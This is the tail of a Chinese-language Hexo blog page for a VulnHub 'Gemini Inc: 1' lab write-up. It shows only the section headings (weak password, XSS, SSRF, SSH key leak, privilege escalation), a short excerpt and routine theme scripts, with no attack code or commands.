        <div class="sidebar-toc-sidebar"><h3 class="toc-title">文章目录</h3>
<div class="sidebar-toc-wrapper toc-div-class" >
    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#USV%EF%BC%9A2017"><span class="toc-number">1.</span> <span class="toc-text">USV：2017</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%BC%B1%E5%8F%A3%E4%BB%A4"><span class="toc-number">1.1.</span> <span class="toc-text">弱口令</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Gemini-Inc"><span class="toc-number">1.1.1.</span> <span class="toc-text">Gemini Inc</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#XSS"><span class="toc-number">1.2.</span> <span class="toc-text">XSS</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Edit-info-of-admin"><span class="toc-number">1.2.1.</span> <span class="toc-text">Edit info of admin</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SSRF"><span class="toc-number">1.3.</span> <span class="toc-text">SSRF</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Export-file%EF%BC%88CVE-2022-35583-%E9%87%8D%E5%AE%9A%E5%90%91%E7%BB%95%E8%BF%87%EF%BC%89"><span class="toc-number">1.3.1.</span> <span class="toc-text">Export file（CVE-2022-35583 重定向绕过）</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%8F%90%E5%8F%96"><span class="toc-number">1.4.</span> <span class="toc-text">提取</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#SSH-%E5%AF%86%E9%92%A5%E6%B3%84%E9%9C%B2"><span class="toc-number">1.4.1.</span> <span class="toc-text">SSH 密钥泄露</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%8E%AF%E5%A2%83%E5%8F%98%E9%87%8F%E6%8F%90%E6%9D%83"><span class="toc-number">1.4.2.</span> <span class="toc-text">环境变量提权</span></a></li></ol></li></ol></li></ol>
</div>
</div>
        <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/avatar/avatar.webp" data-sizes="auto" alt="ALL" class="lazyload">
  <div class="sidebar-author-name">ALL</div>
  <div class="sidebar-description">雾島风起時の日常</div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>文章</div>
    <div class="sidebar-state-number">58</div>
  </div>
  <div class="sidebar-state-category">
    <div>分类</div>
    <div class="sidebar-state-number">11</div>
  </div>
  <div class="sidebar-state-tag">
    <div>标签</div>
    <div class="sidebar-state-number">113</div>
  </div>
</div>
<div class="sidebar-social" >
    <div class="icon-github sidebar-social-icon">
      <a href=https://github.com/duckpigdog itemprop="url" target="_blank" aria-label="github" rel="noopener nofollow noreferrer"></a>
    </div>
    <div class="icon-bilibili sidebar-social-icon">
      <a href=https://space.bilibili.com/1337537884?spm_id_from=333.1007.0.0 itemprop="url" target="_blank" aria-label="bilibili" rel="noopener nofollow noreferrer"></a>
    </div>
</div>
<div class="sidebar-menu">
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/" aria-label="首页"></a>
          <div class="sidebar-menu-icon icon rotate">
              &#xe62b;
          </div>
        <div class="sidebar-menu-link">首页</div>
      </div>
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/archives" aria-label="归档"></a>
          <div class="sidebar-menu-icon icon rotate">
              &#xe62b;
          </div>
        <div class="sidebar-menu-link">归档</div>
      </div>
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/about" aria-label="关于"></a>
          <div class="sidebar-menu-icon icon rotate">
              &#xe62b;
          </div>
        <div class="sidebar-menu-link">关于</div>
      </div>
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/friend" aria-label="友链"></a>
          <div class="sidebar-menu-icon icon rotate">
              &#xe62b;
          </div>
        <div class="sidebar-menu-link">友链</div>
      </div>
</div>
</div>
  </div>
      <div class="sidebar-btn-wrapper">
        <div class="sidebar-toc-btn current"></div>
        <div class="sidebar-common-btn"></div>
      </div>
</nav>

    </div>
    
<script src="https://npm.webcache.cn/lazysizes@5.3.2/lazysizes.min.js" integrity="sha384-3gT&#x2F;vsepWkfz&#x2F;ff7PpWNUeMzeWoH3cDhm&#x2F;A8jM7ouoAK0&#x2F;fP&#x2F;9bcHHR5kHq2nf+e" crossorigin="anonymous"></script>


<script src="https://npm.webcache.cn/clipboard@2.0.11/dist/clipboard.min.js" integrity="sha384-J08i8An&#x2F;QeARD9ExYpvphB8BsyOj3Gh2TSh1aLINKO3L0cMSH2dN3E22zFoXEi0Q" crossorigin="anonymous"></script>




<script src="/js/script.js"></script>


  
<script src="/js/aos.js"></script>

  <script>
    var aosInit = () => {
      AOS.init({
        duration: 1000,
        easing: "ease",
        once: true,
        offset: 50,
      });
    };
    if (document.readyState === 'loading') {
      document.addEventListener('DOMContentLoaded', aosInit);
    } else {
      aosInit();
    }
  </script>


<script src="/js/pjax_script.js" data-pjax></script>




  <script>
    var setupFirework = () => {
      if (!false || !window.matchMedia('(max-width: 768px)').matches) {
        window.firework && window.firework(JSON.parse('{"excludeElements":["a","button"],"particles":[{"shape":"circle","move":["emit"],"easing":"easeOutExpo","colors":["var(--red-1)","var(--red-2)","var(--red-3)","var(--red-4)"],"number":20,"duration":[1200,1800],"shapeOptions":{"radius":[16,32],"alpha":[0.3,0.5]}},{"shape":"circle","move":["diffuse"],"easing":"easeOutExpo","colors":["var(--red-0)"],"number":1,"duration":[1200,1800],"shapeOptions":{"radius":20,"alpha":[0.2,0.5],"lineWidth":6}}]}'));
      }
    }
  </script>
  
<script src="https://npm.webcache.cn/mouse-firework@0.2.0/dist/index.umd.js" integrity="sha384-qi9WggRt19tv8Vc7pCHW3ulMNLwrn515zaLEWZjl1px07vz8+pUoWX8n1rgq282T" crossorigin="anonymous" onload="setupFirework()" defer></script>






<div id="lazy-script">
  <div>
      
      
      <script data-pjax>
        window.REIMU_POST = {
          author: "ALL",
          title: "VulnHub Gemini Inc：1",
          url: "http://example.com/2026/04/23/Gemini%20Inc%201/",
          excerpt: "",
          description: "",
          stripContent: "USV：2017项目地址：https://download.vulnhub.com/geminiinc/Gemini-Pentest-v1.zip 是一个打包好的镜像文件 注意：导入 vmx 时一定要选择我已移动，否则没网 使用 Nmap 扫描出开放服务及操作系统版本  弱口令Gemini Inc扫描目录发现有一个 /test2  访问过去给了一个 GitHub 地址  拿到了项目源码  访问 80 端口，点击 Login  在初始化数据库的代码段中找到默认管理员账号  破解 MD5  弱口令 ",
          date: "Thu Apr 23 2026 16:21:00 GMT+0800",
          updated: "Sun Apr 26 2026 16:33:53 GMT+0800",
          cover: "/images/banner.webp",
        };
      </script>
        
<script src="/js/insert_highlight.js" data-pjax></script>

      
<script src="/js/tabs.js" data-pjax defer></script>

      <script type="module" data-pjax>
        (async () => {
          const PhotoSwipeLightbox = (await safeImport("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe-lightbox.esm.min.js", "sha384-DiL6M/gG+wmTxmCRZyD1zee6lIhawn5TGvED0FOh7fXcN9B0aZ9dexSF/N6lrZi/")).default;
          const initPswp = (gallery, children) => {
            if (_$$(`${gallery} ${children}`).length > 0) {
              new PhotoSwipeLightbox({
                gallery,
                children,
                pswpModule: () => safeImport("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.esm.min.js", "sha384-WkkO3GCmgkC3VQWpaV8DqhKJqpzpF9JoByxDmnV8+oTJ7m3DfYEWX1fu1scuS4+s")
              }).init();
            }
          }
          const pswp = () => {
            initPswp('.article-entry', 'a.article-gallery-item');
            initPswp('.article-gallery', 'a.article-gallery-item');
          }
          pswp();
        })();
      </script>
        


  </div>
</div>


  <script>
    console.log(String.raw`%c 
 ______     ______     __     __    __     __  __    
/\  == \   /\  ___\   /\ \   /\ "-./  \   /\ \/\ \   
\ \  __<   \ \  __\   \ \ \  \ \ \-./\ \  \ \ \_\ \  
 \ \_\ \_\  \ \_____\  \ \_\  \ \_\ \ \_\  \ \_____\ 
  \/_/ /_/   \/_____/   \/_/   \/_/  \/_/   \/_____/ 
                                                  
`,'color: #ff5252;')
    console.log('%c Theme.Reimu v' + '1.12.3' + ' %c https://github.com/D-Sketon/hexo-theme-reimu ', 'color: white; background: #ff5252; padding:5px 0;', 'padding:4px;border:1px solid #ff5252;')
  </script>
  


  
<script src="https://npm.webcache.cn/busuanzi@2.3.0/bsz.pure.mini.js" integrity="sha384-0M75wtSkhjIInv4coYlaJU83+OypaRCIq2SukQVQX04eGTCBXJDuWAbJet56id+S" crossorigin="anonymous" async></script>


<script>
  if ('serviceWorker' in navigator) {
    navigator.serviceWorker.getRegistrations().then((registrations) => {
      for (let registration of registrations) {
        registration.unregister();
      }
    });
  }
</script>




  </body>
  </html>
